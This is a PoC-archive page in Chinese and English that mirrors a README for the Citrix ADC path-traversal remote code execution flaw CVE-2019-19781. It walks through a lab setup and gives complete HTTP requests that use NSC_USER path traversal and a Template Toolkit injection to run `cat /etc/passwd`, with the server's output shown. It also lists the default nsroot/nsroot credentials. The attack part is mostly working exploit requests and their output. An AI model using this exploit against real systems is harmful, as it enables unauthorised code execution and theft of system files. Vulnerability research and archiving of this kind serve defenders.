POC详情: c76697937c8b228ffee62a215f62976c26150f86

来源
https://github.com/jas502n/CVE-2019-19781
关联漏洞
标题: Citrix Application Delivery Controller和Citrix Systems Gateway 路径遍历漏洞 (CVE-2019-19781)
描述:Citrix Systems NetScaler Gateway(Citrix Systems Gateway)和Citrix Application Delivery Controller(ADC)都是美国思杰系统(Citrix Systems)公司的产品。Citrix Systems NetScaler Gateway是一套安全的远程接入解决方案。该方案可为管理员提供应用级和数据级管控功能,以实现用户从任何地点远程访问应用和数据。Citrix Application Delivery Controll
描述
Citrix ADC Remote Code Execution
介绍
# CVE-2019-19781 Citrix ADC Remote Code Execution

![](./CVE-2019-19781.gif)


## python usage:

`python CVE-2019-19781.py http://192.168.3.244`

[![asciicast](https://asciinema.org/a/czEvEqxWWA0nVaCs6BofkEAiW.svg)](https://asciinema.org/a/czEvEqxWWA0nVaCs6BofkEAiW)




## 0x01 download NSVPX-ESX-13.0-47.22_nc_64.zip

 #### https://www.citrix.com/downloads/citrix-gateway/
 
![](ovf.png)

#### configure static networ
![](./static.png)



![](./vmware.png)

## 0x02 nmap scan
```
Scanning 192.168.3.244 [65535 ports]
Discovered open port 80/tcp on 192.168.3.244
Discovered open port 22/tcp on 192.168.3.244
Discovered open port 443/tcp on 192.168.3.244
```
![](./citrix.png)

i am not install SSL Certificate

`http://192.168.3.244/`

default password: nsroot/nsroot
![](./nsroot.png)

## 0x03 upload xml
![](./upload_xml.png)

```
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97

url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
```

```
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:36:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 11 Jan 2020 06:36:44 GMT
ETag: W/"87-59bdd52283e00"
Accept-Ranges: bytes
Content-Length: 135
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>
```

## 0x04 execute command
![](./execute_command.png)


```
GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


```

```
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:37:40 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-control: no-cache
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Jan 2020 06:37:40 GMT
Content-Length: 2255

# $FreeBSD: release/8.4.0/etc/master.passwd 243948 2012-12-06 11:54:25Z rwatson $
#
root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin
&#117;&#110;&#100;&#101;&#102;&#32;&#101;&#114;&#114;&#111;&#114;&#32;&#45;&#32;&#65;&#116;&#116;&#101;&#109;&#112;&#116;&#32;&#116;&#111;&#32;&#98;&#108;&#101;&#115;&#115;&#32;&#105;&#110;&#116;&#111;&#32;&#97;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#32;&#97;&#116;&#32;&#47;&#117;&#115;&#114;&#47;&#108;&#111;&#99;&#97;&#108;&#47;&#108;&#105;&#98;&#47;&#112;&#101;&#114;&#108;&#53;&#47;&#115;&#105;&#116;&#101;&#95;&#112;&#101;&#114;&#108;&#47;&#53;&#46;&#49;&#52;&#46;&#50;&#47;&#109;&#97;&#99;&#104;&#47;&#84;&#101;&#109;&#112;&#108;&#97;&#116;&#101;&#47;&#68;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#112;&#109;&#32;&#108;&#105;&#110;&#101;&#32;&#57;&#50;&#46;&#10;
```

`undef error - Attempt to bless into a reference 
at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.`

## 参考链接

https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/
文件快照

 [4.0K]  /data/pocs/c76697937c8b228ffee62a215f62976c26150f86
├── [495K]  citrix.png
├── [9.9M]  CVE-2019-19781.gif
├── [3.0K]  CVE-2019-19781.py
├── [441K]  execute_command.png
├── [447K]  nsroot.png
├── [103K]  ovf.png
├── [4.9K]  README.md
├── [ 83K]  static.png
├── [318K]  upload_xml.png
└── [ 91K]  vmware.png

0 directories, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。